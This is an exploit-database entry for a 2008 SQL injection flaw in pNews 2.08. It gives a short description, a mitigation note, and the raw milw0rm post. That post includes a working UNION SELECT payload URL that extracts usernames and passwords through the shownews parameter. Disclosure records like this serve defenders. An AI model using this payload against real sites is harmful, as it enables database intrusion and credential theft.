header-logo
Suggest Exploit
vendor:
pNews
by:
Cr@zy_King / sqL L0v3r'Z Crew Co.
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: pNews
Affected Version From: 02.08
Affected Version To: 02.08
Patch Exists: NO
Related CWE: N/A
CPE: 2.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

pNews 2.08 Remote SqL Ä°nj. VuLn.

pNews 2.08 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

pNews 2.08 Remote SqL Ä°nj. VuLn.

OrginaL : http://biyosecurity.com & http://coderx.org

Cr@zy_King / sqL L0v3r'Z Crew Co. 2008

Script Down ; http://www.powie.de/cms/filedb/file.php?id=115&filecat=&eintrag=

http://localhost/index.php?shownews=2'+UNION+SELECT+1,2,username,4,pwd,6,7,8,9,10,11,12+FROM+table/*

Greatz : aLL My Friends :P 

# milw0rm.com [2008-06-09]

Navigation

Suggest Exploit

Services By CQR